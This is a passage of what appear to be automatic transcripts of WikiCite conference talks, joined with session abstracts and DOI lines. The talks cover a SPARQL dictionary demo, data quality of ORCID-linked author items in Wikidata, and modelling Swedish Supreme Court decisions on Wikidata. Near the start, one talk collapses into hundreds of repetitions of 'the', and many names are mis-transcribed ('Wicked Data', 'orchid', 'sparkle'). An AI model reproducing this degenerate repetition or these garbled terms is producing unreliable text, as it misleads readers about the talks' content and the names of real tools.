it and you could also use a run a code or you could also check into it. Here are the results. You could find here that as I said, these are the results with the unique identifier, the molecular name, they will English Wikipedia links and alternative labels and so on. You could have identified the identifier in multiple times. We could visualize that many South Asian languages people have not added their language terms into it. It is so hard to catch up things which have been added. For this particular drug, we could have drugs in English, Spanish and German. There are some drugs which are all the languages into it. This is how sparkle endpoint works. Once you have to for downloading sparkle endpoint output, just click it over here and sparkle endpoint, just give an end results. It just takes nearly half a minute to get downloaded in your local PC and you can directly redirect into MEDIC and further explore your dictionary. Thank you. Thank you so much Rajan and Dheeraj. If anybody has got questions for both of them, please feel free to leave them on etherpad. We now have Vaishali to talk about her many projects, viral epidemics and funders. Over to you Vaishali. Thanks Shweta. Hello, I am a graduate student at University of Delhi, India. First let me share my screen. Is everything okay Shweta? Okay, you can go now. Alright, so I will be talking about the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the the
|
We are a globally distributed project, spontaneously created to use semantic knowledge to tackle the viral pandemic. The world's scientific literature, when annotated and aggregated can be analysed with modern data analytics to find new patterns. We have built multiple dictionaries from Wikidata, faceted by scientific and social disciplines (country, disease, drug, funding, virus, etc. and created minicorpora (from EuropePMC and Redalyc) which are searched and annotated locally. The early applications include identification of main subjects within each facet, and occurrence of these subjects. Our dictionaries are multilingual (EN, HI, TA, UR, ES) and we're testing how well they search and annotate non-English sources. Our Open Source material (Apache2, CC BY) can be installed and run by non-specialists. This session will explore the role of global semantic knowledge, and seek collaboration with other parts of Wikimedia.
|
10.5446/51079 (DOI)
|
Hello, welcome back to the author items session at this wiki site conference. So before I introduce Simon, the first speaker today, I just want to remind everyone that this event is covered by the Wikimedia Foundation friendly space policy. So you can see the link at the bottom there if you want to find out more about that, but please just be aware that this is a friendly space, be nice to everyone and follow that policy. Now then, I want to introduce the first speaker, which is Simon Cobb, and I've known Simon now for, gosh, probably going on for five years. He first approached us at the National Library and asked if he could help. He was interested in wiki data and Wikimedia and he wanted to see if he could help out in any way. He went on to become our wiki data visiting scholar, the first position of its type in the world as far as we're aware. And Simon's done some fantastic work, not just with bibliographic data, but all sorts of different collections, sharing them on wiki data, developing the way that those are modelled. And most recently he did a huge amount of work getting over 30,000 books from the National Library of Wales collections onto wiki data and really working hard on author disambiguation and getting all the publishers connected. So I'm really looking forward to hearing Simon's talk, so I will now hand you over to Simon. Hi everyone. So I'm going to talk about author items in wiki data for the next few minutes. As Jason said, I've been doing a lot of work over the last few years with bibliographic data and what I want to do in this presentation is highlight some of the issues that I'm aware of about data quality concerning author items. I want to share knowledge about how we can import more data from ORCID and primarily what I want to do is start a conversation about author items, the data quality and what we want to do with them really. We're just creating a lot of author items at the moment but I don't think we've given sufficient thought to a strategy for how we're doing it and how we're improving and maintaining that data. So that's something that is a theme that runs through this whole presentation. So just to set the scope, this is focusing on author items who have an ORCID ID. We've got about 1.6 million of these in wiki data now. I've done some analysis to prepare my presentation and I also wrote a paper which is available on Commons which I'm effectively presenting now but there are a few differences. I've done some analysis of a 10% sample of these author items and that was done using checksum beginning with 0 and then two following digits or an X from ORCID IDs which I have then compared data from wiki data and ORCID and I'm going to talk about some of the findings of that analysis now. So the first thing I want to talk about is the properties that are used on author items. I've just identified a list of properties which are likely to be found on humans and we might expect people who are actively publishing scholarly articles to have these properties on their wiki data item and it becomes apparent quite quickly that we don't have very much data about these authors. In some cases it's understandable because we don't know that much about them but in other cases it's just the items are sparse because they haven't been worked on. A really good example of this is the names, the family name and the given name of the authors. We have what just over a quarter of the items have a given name, less than 10% have a family name. This data seems to me to be readily available either from publications or from their ORCID. So it seems inexcusable that we've got such low coverage of it in these properties. There are other things that we should really have. I feel quite strongly that we need to have better affiliation data because it's just so important for any further analysis of author items or their publications. The author acts as a node between a publication and their institution. So if you want to study the research for an institution you tend to need the affiliation data to be on an author item. This is not a secret. This data can be gleaned from publications or from other databases such as ORCID which we know is linked to all of these items. So the fact that we've only got a little over a quarter of all of our author items have an employer, well most of them will be doing work in the context of their employment. So I would argue this should be closer to 100%. Although I don't think we can ever achieve completeness I would say. There's other things like language spoken and written or field of work. I would have thought that for researchers we need to focus on improving our coverage of these properties. Both less than 1% of the items studied have those properties. I just think this is quite low across the board and we really need to work on it. If anyone saw Daniel's presentation about the state of Wicked data earlier I'm very mindful of what he's saying about avoiding thinking about how big the challenge is. I think that's really shrewd but I also think we have to keep on taking steps to improve what we have and think about where we're going with this rather than just creating items and hoping to get improved later. So this is quite interesting. It's showing the number of statements on average over time so as we move from left to right you notice it drops off towards the newer items. Obviously the old items have existed for longer and they've had more time to attract curatorial efforts of the editor's community. But nevertheless we have over the last year we've created something like 110,000 new author items just in this sample data and they all have around four and a half statements on average per item which is really too low and should also state that it's not clear from this chart but the last quarter it represents about two thirds of the total number of items so it's really quite a sizable problem that we're creating very sparse author items and they're not receiving the efforts of editors to improve them for a long time. I think that makes it quite difficult to use them because well people might be interested in doing curation for their institution or subject based editing without having sufficient data in the author items you can't really identify a subset to work with. So it becomes a very manual process unless we can start importing data to improve these items in bulk editing processes. We also, I want to draw attention to what I think is a nonsensical equation. We've got occupation equals researcher times 1.66 million. I don't think we should be adding that everyone who has an orchid is a researcher. The screenshot shows my wiki data item. I can tell you I'm not a researcher but I do have an orchid and that's because I contribute to publications. We have to bear in mind that orchid isn't just for search it's open researcher and contributor ID and we've ended up with a lot of garbage. We don't have occupations that we can query and identify what sort of work people are doing. We're a researcher and we could infer that from the orchid if that were true anyway. This is just an example of large scale creation of what I consider pretty useless data. That's a personal opinion and you're very welcome to disagree with that. Let me know what you think. I'd be really curious to know whether anyone thinks that's useful to have. So moving on, this is an example of some incorrect data that's been imported. At a glance you might see quite a number of things that are wrong with it. It's actually the wiki data item for Anton Bernard that was incorrectly labelled as Differential Society for Pediatric Hematology and Immunology for 10 months after creation. It had that label despite having an orchid, despite being an instance of a human and having occupation as researcher. It's just incompatible to have that label with those properties and nevertheless it's just persisted for 10 months. Until I noticed it I did rectify it but it's quite difficult because you have to then go back through the publications that are linked to and start picking what the actual affiliation is or whether you need to split the item. It becomes quite time consuming and I think it's indicative of mass data imports without sufficient validation taking place. I'm regularly editing orchids that have been imported that aren't consistent with the format regular expression so they can be in correct lengths, they can have just completely incompatible formatting for working orchids. I just don't really think this is good enough. I'm hoping this resonates with other people and we can start discussing how to avoid these issues. Obviously there's a lot of data linked from Wicked Data by virtue of having orchid IDs and we can start importing that data and improving the situation. The problem is when we want to import affiliation data so that's employment or the place of education for the owner of the orchid profile. We have to first go through a process of reconciliation to match what organisations are stored in orchid with Wicked Data. This is fine where we've got persistent identifiers that we can use to unambiguously make that connection. However, unfortunately, we don't always have the identifiers in Wicked Data and it's particularly a problem because Ringold identifiers are so widely used in orchid that we have less than half of them seem to be in Wicked Data. There's something approaching half a million in orchid and something like 65,000 in Wicked Data that are attached to organisations. Without those connections between the persistent identifier and the Wicked Data item, it becomes very difficult to reconcile successfully because orchid and Wicked Data are both using multilingual affiliations and there's a myriad of different name formats you can use for any one organisation anyway. Trying to reconcile using just a text is very, very challenging. I haven't discovered a viable way of traversing from a subunit of an organisation to the parent if the subunit doesn't exist. For example, if I was trying to reconcile a faculty which isn't in Wicked Data, it's very difficult to then go to the university which probably is. There's no connections in orchid or they're generally lacking in Wicked Data to do that traversal. So, just end up not being able to import that data and we can't reconcile it. Whereas if you could go to the university and use that for the subunits, you would be able to start adding affiliations and potentially then improve it later. But unfortunately, that doesn't seem to be an option at the moment. I just wanted to comment as well on the distribution of the persistent identifiers that we have in Wicked Data. If we rely solely on what we have already, we're going to be importing a lot of data about a few countries really. We're going to be connecting authors in USA, in Britain and a few other countries in particular. I'm just a little bit concerned this could introduce biases or reinforce biases that we already have. We need to improve this distribution to get better worldwide coverage of affiliation data into Wicked Data. It's going off topic slightly because this will get into a need to curate data around institutions. But that is a prerequisite. I've been able to add affiliation data to authors. Anyway, I think that's enough said about that. I think it's something we should be mindful of. So additional problems which make reconciliation and data imports challenging. In Wicked Data, we've obviously got an incomplete dataset. We don't have all the institutions and their components. Further, we don't have all of the roles that a researcher or anyone working related to research publications could be in. We don't have all the academic ranks. We don't have all the degrees. So these are all things that you can't reconcile and import that data because we don't have it. I don't really know where we go with that. It's a big challenge. But it does limit the amount of data that we can import. We also have some errors in Wicked Data. I think there will always be errors in Wicked Data, but we need to be aware that there are identifiers linked to the wrong institution. For example, if an ISNI is linked to the wrong institution, it can lead to the Ringgold being linked to the wrong institution, which can then cause data imports to be incorrect. So you can end up with a chain of errors that, unless they're addressed, they will just carry on creating more and more errors as we go along. That's obviously a problem. It does get picked up. People every now and again send me a message and say you've done some incorrect data imports. It's great that people do that. If you have, thank you. Not only does it highlight errors in my own work, it enables me to identify what's causing those errors and prevent them from happening again. Another challenge or another conversation, perhaps, is around how we store deprecated identifiers in Wicked Data. So if an identifier is withdrawn or redirected, I think we need to be consistent in how we're handling those so that we can still reconcile against them and import data. The worst thing we can do is just delete them. We need to retain them, but it's probably just need some consensus on whether we're storing them as preferred rank, deprecated rank, or just to know what we're doing, do it consistently. There are also problems in ORCID, which cause challenges when we're trying to import data. The example shown is, I would say, excessively granular. They have eight different entries for one continuous spell of employment at the same institution. If we were to import this to Wicked Data, I don't think we could assign any role that rarely differentiates between them. So there needs to be some sort of consensus around how we handle things like this, whether we just roll all of this up into one, or whether we do want that granularity. I have to admit I've been a bit inconsistent in how I've dealt with this when I've been doing data imports. And that is just purely because I don't know what the best way to do this is. So that's really something that I think needs some discussion and we need to put a bit of thought into that. There are also errors in ORCID that someone recently highlighted. This one, to me, they said, when I got a message there in a batch of my imported data was wrong, it turned out that it's because the ring gold hold for the University of San Paolo in ORCID. In this ORCID is incorrect, so it ends up causing reconciliation to the wrong institution which causes data to be imported incorrectly. It's not a big problem that I'm aware of in ORCID, but it does happen. It's just, again, something to be mindful of. Okay, and the final one that I wanted to highlight is in the education record where people are compressing two degrees into one entry. It's very challenging to work with because you need to decide whether you're going to try and split that out or you're going to try and split it, reconcile two degrees and import it or just quite a few different ways that you could handle this. Usually it just ends up being things that don't get imported at the moment because there's a lot more low hanging fruit to take, so why work on the difficult stuff when there's easier things, it's been my thinking. But at some point we are going to need to tackle this if we want to import this data. So I'm suggesting a few next steps of where we might go with this. Again, this is really to try and start a conversation. I'm not saying we have to do it this way. If you disagree, the best thing to do is say so because that will contribute to the conversation and we can reach some sort of consensus. I think we really need to consider what is the minimal acceptable standard for author item data. I really question whether some of the imports that are happening on mass at the moment are creating data that's good enough quality and whether with small improvements we could make quite a big improvement to data quality. Sorry, that small improvements to the import methodology could make quite big improvements to the data quality. I think to help decide whether the standard is good enough, we need to define requirements for different use cases. What are we actually doing with author items? Are we just creating them because we can? Are we creating them just as a node to link different publications? Or do we want to do other things with them as well? When we know that we can start looking at what data is needed for those different use cases. Some of the other things are just relating to persistent identifiers. I won't go into those in detail. I'm currently going through a process of validating my own data imports and trying to identify problems. It's very difficult to do that because I haven't stored in the references to put code from orchids so we have to import the entire set of employment or education summaries rather than being able to link directly to a specific summary. Which leads to, I think there's a need to start storing the put codes in references in wiki data when we're importing data from orchids so we can validate it in the future, check for updates, etc. What I really want to do, kind of my motivation behind organizing this whole session, is to work towards setting up an online workshop so we can actually have discussions and we can work out how to collaborate around author items. I know there are other people who are working on improving data quality but we're all quite disjointed so it would be really good to get interested people together and have a conversation, think about how we can work collaboratively for the overall good of improving data quality. So that's a summary of what I'm thinking and what I've been working on so I'm happy to take any questions or very interested in other people's comments on this topic as well. Brilliant, thank you very much for that. Simon, that was really interesting and yes we do have a few minutes for questions. There are some in the etherpad already but if you have any others and you want to ask them just pop those in as soon as possible and I'll try and ask Simon. So the first question we've got for Simon is, is it possible to do a mix and match between orchids and viath? Well, mix and match is a tool for importing data to wiki data so not directly I don't think, you'd have to import data about one to wiki data and then import the other based on wiki data so probably yes. I guess wiki data is kind of a mix and match in a way isn't it? Yeah, it is but not as easy as it's made to sound like. Cool, there's a comment question. Someone's a bit worried that wiki data items with orchid IDs might be linked to the wrong people or incorrectly listed as an author on an item about an article for example. So do you come across these kind of errors? What are your thoughts on this? Yeah, I mean I highlighted one in that presentation which was a glaring error where it was clearly an organisation that had been created and that was, I believe that happened because the wrong author in a list of authors on a publication was scraped and imported and associated with the orchid ID. So yes, it does happen. I think there's a serious need for doing data validation across all the scholarly articles and these mass data imports that haven't been touched by human editors because yes, there will be errors, it's inevitable but I have no idea how big a problem that would be. Okay, thank you. The question is, do you have any thoughts on using DBLP as a preferred identifier with a fallback to orchid? That makes sense? Yeah, it does make sense. I don't know why you'd use it as a preferred identifier. I'll use it as an extra identifier on top of orchid and probably fall back to DBLP rather than give way round. That's a personal preference I suppose. Just to elaborate on that slightly, I would say because orchid is curated by the author, it's an unusually reliable source although obviously times when that could be a problem but in general it's probably the best source of data we have for author items and then afterwards we should start looking at other sources where orchid isn't helpful. Fantastic. I think that's about it for questions. Apologies if you have posted a question somewhere and we haven't seen it but I'm sure Simon will be happy to take questions on Telegram or anywhere else during the afternoon. Yeah, very much so. We've got a break later on so if any questions emerge you can potentially take them later or just general questions that can come up during the afternoon or if you have a question you think of it later just send me a message on Wicked Data. I'm on there all the time so we'll know you'll be fine quite quickly.
|
Data quality, disambiguation, profiles, persistent identifiers, etc.
|
10.5446/51091 (DOI)
|
Hello and welcome to this wiki site session. We're going to talk Swedish Parliament and New Digital documents and their use. And your host tonight is me, Jan Einle and Daniel Ekshaw. Hello. How are you doing Daniel? Very well thanks. It's a wonderful rainy evening here in Stockholm. We had a pleasant day here. A little bit first of an autumn day here in Amsterdam. So what we're going to talk about today is quite of a long project, but we're still just in the midst of it, I would say. We have so much ideas, but it's about this golden treasure of the open data portal of the Swedish riksdag, the Parliament of Sweden. But before we go into the depth of that, we want to give you a little bit of introduction to how we got started. And before we go into depth, I want to give you some housekeeping things. So everything today, we have the WMF the Wikimedia Foundation Friendly Space Policy that we're here to. So please be friendly to watch each other in the chats. And we have the chats activated here both on YouTube and on Periscope and we're also streaming this to the Swedish Wikipedia group, Facebook group. So you can all comment there and we will see it and can bring it up. And we have already had like a friendly hi-all from FIWI here. So please ask us questions during this entire session because I think there are things that you might want to know more of that we have so internalized to even bring it up because we have been thinking and talking about this a lot. Yeah, there might be a lot of special peculiarities with how the Swedish system works that we don't quite think about but not everyone knows. Yeah, and we have learned a lot about the Swedish peculiar system when we have digging into this. And I think that's almost like it's everything when you go into the Wikidata and think, ah, I know this topic, I can model this. And then of course you see, ah, no, it's much more complicated in reality. And what else do we have? So you can comment directly where you're watching, but if you rather want to, you can also comment in the Telegram group for Wikisite. And yeah, that's about it. So let's dive into the introduction of Swedish project. I'm going to share my screen here. This is the share screen. So Wikiproject Sweden. I guess most of you people know about Wikiprojects in general. And Wikisite is of course kind of a Wikiproject. But we, when we started here, it turned out that there were already a lot of things done in regards to Wikidata and Sweden. And I guess most of the countries have this kind of properties country box where you can see the properties that are available to you when it's related to your country. And that's sort of where we started. But when we started to get into the nitty-gritty of things, we saw that there were already things being done before we even got here. So one of the first thing is this sub-project from the Wikiproject EveryPolitician which is of course a much larger project that started years ago and which had much larger scope like trying to get every politician onto Wikidata and see if it loads here. Yes. And we have this little bit of tracker here and I think we have just gotten up to two stars here on Sweden during this because one of the first things we wanted to do before actually going anywhere was to get all the parliamentarians into this. And we're going to meet some of the people who have been in that process as well. And the most complicated things about that was that most of the politicians already had an article on Swedish Wikipedia but their Wikidata items weren't very good at all. So we had to improve them and that was tough because since they had some data it was hard to run a bot because it's easier if there's no data you can just add in everything. So we did a lot of work by hand to get that up and running. How did you solve it? I think we may have just lost the article. I think I just exited the stream there. Good to have you back. I was trying to ask what you would do to solve it, maybe that's going a bit or too fast into what we were going to talk about later. How did you solve the problem of disambigrating or not adding duplicate politician? No, I think that's a great question to start with because that's what you run into in the beginning. Luckily in the Swedish open data set there's an identifier for the parliamentarians which has been of great help to actually point like this is exactly this one because of course you have a few parliamentarians with the common Swedish names so you can have three or four with the same name but they've been there over the years. That helped us a lot to get started. Let's see if I can get back to share my screen here again. This is where we were. Yes. That's where we got started and this actually started last year about this time. I thought I can do this by hand and be done by Christmas. It took a little bit of a longer time than that but eventually we got it done. Then it was easier to backfill with the rest and then when we had the politicians there it also seemed easier to start adding more things to it and that's where we actually got into starting a Wiki project. Of course we weren't the first trying to do a Wiki project in our country so we copied proudly the design from Wiki Project India and just customized it with our colors and made a logo for ourselves and that's in our background here. Then we started with some plans and ambitions like what we want to do with this project and how can we collaborate and a few people joined and we actually started a telegram group just so that we could chat in Swedish and not spam the general Wiki data group with all our nitty gritty details because there are always a lot of nitty gritty details. Then when we had something like oh this is a larger question that relates to more countries or all the countries then we bring it up to the general Wiki data group or going on Wiki and having a discussion or going to a property talk page. I think having a place to shout out ideas or questions in a more live fashion almost or having fast real-time answers is very helpful when you're stuck on something and you need advice so it's been a very good catalyst I think for getting some of this work done that we're going to talk about today. Yeah. I'm going to mark a few of these. These projects were already related to Sweden and existed before we started this project. So there have been sub projects in specific topics. Some of them quite large because the Wiki loves monuments that includes like 150,000 monuments so that's quite a big one. They're working on my PC right? Yeah. But this one now we could actually join forces. Everyone who had some sort of common thing about Sweden to some interest. And these are the two things that we're going to talk about today. We're going to talk about the Riksdag documents and the court decisions. And of course here are all the things we have. Do you have anything thoughts in general Daniel on how this over viewing project has helped us? So I think I mean it's had it's been a place to sort of showcase I guess what is happening around Sweden related topics in general and to bring together this first group of projects that have some kind of relationship to Sweden that were a little bit overall on Wiki data. And I think it is mainly I think it's working as a showcase where people can get ideas for oh someone has done this already but what if I were to do something similar but with this other data set or without this other group of objects. Yeah. And then of course we have had this project page to talk on. We have had this telegram group in Swedish which makes it very easy for us because as you can hear we're not native English speakers. This is our second language. So as soon as we go into details especially when you go into details about the parliamentarian processes like it's tricky even for a swede knowing the difference of the like inquiry reports and other kinds of documents and what they actually are. So following back into your native language has helped me a lot. Yeah. I mean we try to keep the discussions on Wiki in English to I guess to share our thoughts and ideas with other people who might be interested in seeing them but having a place of Wiki where we can discuss that in in our native language has definitely helped. Yeah. And of course doing it on English on Wiki has also helped because we have had gotten a lot of help from other people discussing how we should use different kind of properties. I think one of the biggest thing was that after getting all our parliamentarians on there the way we connected them and their offices to the party they represented we used the wrong property for that in the beginning. So we used the member of party where we should use the parliamentary group and the nuances in the labels in Swedish made it really unintuitive for a swede to know this is not applicable to us and then after discussing like no but every other country using it in that way. So perhaps we should just change the label in Swedish to make you understand and of course that makes querying a lot easier afterwards and I think we will get back to that a little bit later how that is of course a factor in everything. So just quickly going through this project before we move on into the other things. Yes. So what I was going to say besides the the telegram group and being on Wiki we are also doing online editathons but not really editathons we have more like having online meetings to discuss because we haven't edited much have we Daniel? It's been very little editing. Yeah. But we meet like having a steady time each week just sitting down and chatting a little bit well like what happened and what our ideas sometimes that unlocks so much of the things that are hard to express in words especially when you come into the complex things of qualifiers and modelling. I think also even if the chat is great I think talking well not face to face but at least on a video meeting that you can maybe faster iterate or come up with new ideas faster in that setting. Yeah. So let's head into our first topic of today which is is it the core decisions we're starting with? I believe so. Yes. Do you want to share the screen? Yeah I think that might be a good idea perhaps I can give some introduction just to what it is even without sharing the screen. So why would you want to do this? Why would you want to put core decisions on wiki data? Sweden is a bit different from some countries that well the one that I know mostly perhaps is the US which you hear a lot about in the news because the Supreme Court in the US is rather powerful and important. The Swedish Supreme Court is maybe a bit more anonymous but it's still quite important and in recent years I think taken a bit more of a or using its power and actually accepting precedent where before they maybe would not want to step in where the law is unclear or ambiguous now they actually step in and say this is what we believe the law should be and if the legislative branch is not happy with that they will have to change the law. So they are a little bit changed the way they do things and it's kind of interesting to be able to look at some of those patterns. And of course what I looked at was as well the US so on Wikipedia pretty much every Supreme Court case I think in the US has a Wikipedia page already. Everything is modeled great in wiki data perhaps and some of them that are modeled out. So I'll show you one of my or one of the more famous perhaps US Supreme Court cases. You already put my... Yes, so this is quite a famous case right, the Citizens United versus Federal Election Commission which is I think about probably some American is going to tell me I'm wrong here but I think it's about how companies can finance campaigns in elections and specifically it said that corporations do have the right to free speech and financing a campaign in elections is free speech according to US law or the US Supreme Court anyway. So that's kind of what this case said in a nutshell. And if we go through quickly what it is I think I should change this to help people. Yeah, help our viewers perhaps. Indeed. Of course it's got an instance of a Supreme Court decision for some reason there are two instances out here. Maybe someone should look into that. What is the difference between a Supreme Court case and a Supreme Court decision? I'm not sure. So it has a country and a jurisdiction, it has a publication date obviously, it has some significant events that are all the oral arguments and the decision dates. It's got a citation and this is how you would if you write a text about this decision how would you refer to it? So this is getting into the interesting stuff for WikiCite. And there are often for legal texts and court decisions there are ways to refer that are rather standardized and in the case of the US Supreme Court there are a number of ways you can refer to a court case depending on which publisher you are using for your... I think there are duplicates from that. Probably, yeah. No, they're different, there's a space in between there. Is there a space? Ah, okay, maybe I should not. Would you leave that to someone else who knows better than I do? So it has a court, right? And then it's published in the US United States reports. It's got even a commons category, it's quite a famous decision. It's got a majority opinion that was written by Anthony Kennedy here. Alright, that also has a reference there. Indeed. And then there are a few other identifiers on the page in Wiki. There's also quite a lot if someone is curious. There's also quite a lot of other information on the Wikipedia page that you could actually bring in and insight on there. For example, there are a lot of opinions on this that we're going to talk about a bit later. How we actually modeled the opinions. Yeah, I think Phoebe or once had us here. Yeah. Indeed. Indeed. So that was a US example. And so I looked at that and stole quite a lot of the modeling. I guess there's one more thing that is actually showcased on this item, which is how you model the different opinions. Yeah. Then I went to sort of, okay, what can we do for Sweden here? So what is the data source for this? Well, there is, of course, there is the Supreme Court website and this is all in Swedish, but we, let's open up one and look at it. Anyway, I think I'm going to search for one that is from last year. It's because it makes life a bit easier to show something. So these are all the different decisions, right? We can pick one that is a funny name perhaps. Trying to see if it has something interesting, but maybe not. We'll be about to leaking roof. The leaking roof. All right. Sounds very interesting. So this was a question about the responsibility for correcting a problem in an apartment where there wasn't damage posed to the apartment and to another part of the house. So who was responsible for paying well? So typically, you know, litigation around who pays what and probably some insurance companies involved here. So this is the sort of website that I had to work with when it comes to sources. And this is the website and then you have a link to the PDF which contains the pool written decision. And of course for 2019 and I think a few years back you have a little bit of actual data here on the side which helps. There's the law supply, there is a name that is given by the court to the case, there is a case number and there's a few keywords that are sort of helpful. So one of the first things that it was just to sort of scrape this website and scrape the name and this is what we talked about the legal citation. So this is how you would refer to this case in Swedish legal text. But I'm pretty soon this, I realize that this information is not that great. So we actually have to go and look at the final case. Now you're not sharing that view. You have to share again. Okay. Of course. So here it goes. So here's the written case then. And it's got some interesting information here. So one of the things that I really wanted to get at was this actually down here. At the very bottom. It says in this decision have been taken part the justices and the justice and the judges. So these are the judges that took part in this decision. This is a bit of a Swedish court perhaps. Not like in the US where the whole court always decides in the full chamber of nine justices in Sweden. There are typically five justices that decide one case. And the court has decided court has 16 or so justices that they are specialized in two different department departments. One about criminal cases and one about civil cases. They tend to only decide decisions in those, in the cases within their area except for a few very special decision where they overturn a part of previous precedent where they would actually have a full chamber of all the 16 justices that decided together. And then there's another peculiar thing here which is the, it's called referent in Swedish or maybe a reporter or a reporter or reporting judge in English which is the justice that is in charge of that case. So that's also something we wanted to record. And then try to make it more a little bit faster this time. So if we go back then to actually look at this case we can search for it. So the name is the available on Wikipedia. Search for it's name of the item of course. And so here we can see whatever the decision from the Swedish Supreme Court would look like once it was imported then. So we have it, it's a decision of the Supreme Court of Sweden. It's got a title which is set by the court. So consider this the official title. And if for some cases that are older that was not given a title by the court we just put this as no value to indicate that. So that way we don't get for example problems when we add citations to these documents otherwise we would get to constrain violation because the document doesn't have a title. It's got a language publication date, the citation, so some of the things you've seen. And then I've added here which are the judges that were part of deciding that case and we've added a little qualifier here for the reporting judge. I guess published in is kind of interesting. It's published in a special review yearbook of this court that is called so we can actually, these actually have ISBNs and stuff so they are model like a typical edition edition object. You have a link to this PDF as well. We have a majority opinion here so this has part of a majority opinion and here we come to the different types of opinions. In this case the all the five judges agreed or justices agreed and they all ruled the same so they all joined this opinion. There's not really information about who wrote an opinion in the court so we don't have an author on this in Sweden. And then we have added some citations here also which we are going to talk about much more in depth how we did later. But these are citations to Q items which I think probably represent other legal texts that we're also going to talk about later. So the actual draft legislation that was going through parliament for example. We also got a special Supreme Court case number which is a special identifier for all these cases we can use to get back to that website we saw earlier on the court. That was a brief overview John do you have any questions from the audience or anything? We have some general discussion about court cases and how they could be modeled in the case and the decisions and to be clear then we have mostly been working with the actual decisions in this import. And you were about to start with that but what we were starting to dream about why start with the court decisions is that we realized since they are so important they start sort of a chain reaction. Because the court, the Supreme Court is the ruler of how a law is going to be interpreted and then it might lead to politicians wanting to change the law if it doesn't go in the way that you thought it would be or how it was supposed to be or times has changed since the law was written perhaps by technology or society. And here we started to imagine alright so this could be the start which feeds into a political process and this is where the parliamentarian documents will take on. Yeah it's exactly right and we've seen a few cases in the last years now where these as I said the court has made decisions where the law is ambiguous and then more or less told the legislature the legislative branch that you should fix this. Do you have any examples of things this refer to or from? Maybe. I was thinking of looking at this opinion so we can see. Do you mean a court case referring to something? Not citations but... Yeah or maybe we take that in the second session with the citations. I had otherwise these sort of cause and effect things I think. The example I was thinking about now is a bit too recent so I don't think we have that modeled but there was just a few weeks ago a case of a court decision that led to the government starting an inquiry into the change. Yeah. But this is an example of something a bit more difficult when it comes to modeling the different opinions and this is a model that I did not draft. It was drafted for the US Supreme Court cases and I just stole that proudly. So we got majority opinion. Here there were two justices that agreed on the majority opinion which is the main body of the text. And then there were two justices that had a dissenting opinion that meant that they wanted to rule differently in the case. They have a special opinion supporting that. And then you have a different opinion which another justice had which means that they agree with the decision but they don't agree with the reasons that were given. So they have another way to get to the same result. Alright. There is another peculiar thing here which is called an addendum which is often written by or often but sometimes written by the justices to either clarify their own position or why they voted in a specific way or they want to tell the legislator that they think it's ought to be fixed. So that's for example Stefan Linskouk who is the former, I believe he's the former Chief Justice. He was kind of famous for writing these opinions to the legislator saying that you should fix this. He wrote actually quite a lot of those. Alright. So hopefully they will show up when we're getting further into this project. And I guess maybe we can talk a little bit about the challenges of importing. You already saw that this was a PDF file that we were reading this from. So I actually didn't want to go through all of these hundreds of cases, about 100 cases every year I think, for years. I didn't want to go through all of those by hand and adding the justices. So as with the politicians one of the first things I did was actually just make sure that the whole history of justices on the Supreme Court was correct in Wikipedia and I had quite a lot of help from the Swedish Wikipedia page that had a very nice list article that I could basically scrape and import to Wikipedia. So wherever Justice was a red-linked on Wikipedia, I sort of could almost guess that it would not have a Wikipedia item either. And that helped me get them in better and it had also the period of time they were on the court and so on. So I got quite a lot of information for free that way. So once I'd done that I could write a little bit of a script that would go through and scrape those PDFs. Well it was a bit tricky because those PDFs, they aren't written to be machine readable and there's slight variations in style how you write it and it had varied a little bit over time so there was quite a lot of trials and error and in the end I got about a 5-10% error rate on them. So I would still create most of the information about the case and the item but there might be that the justices were not included or there was not all opinions were given justices that joined them and so on. So it would just let my script spit that out in the log for me and then I would sit and work through that log file after I've uploaded to like 5 years worth of cases or something and just manually go through that file. So instead of having to do 100 cases a year I could do maybe 5 or 10 and just parts of them manually. So that helped quite a lot. Now you used Wikidata integrator and custom script for doing that. And I think we also almost skipped a little bit of a step here because you touched up on it when you mentioned modeling but I can really recommend using some sort of template or a table and there are these different kinds that you can use. Now I'm zooming in too much and I'm going to zoom out a little bit here. Maybe I skipped that because I myself did not know about this when I did it. So this is a place where collaboration on Wiki is really helpful because here we can sketch out how we think we should model this based both on the data that we have and also on how we're seeing the properties being used on other places on Wikidata. And it's also a great place for other people to find and come with suggestions. And as I said I think I actually sketched this out partly after the factor after I started my imports but it was quite useful. Maybe we have something else that is useful below there. Yes, this is a great tool called Integrality which helps you keep track of data and here we're still trying to figure out what tables are most useful for us but we added a few that we thought were going to be interesting like which laws apply to these court cases. Are they citing other work? And here you can see quite a lot of these cases actually do cite other work. And then of course main subject which can help you find topic areas of things. We still have some work left to do on the classification. And here we see 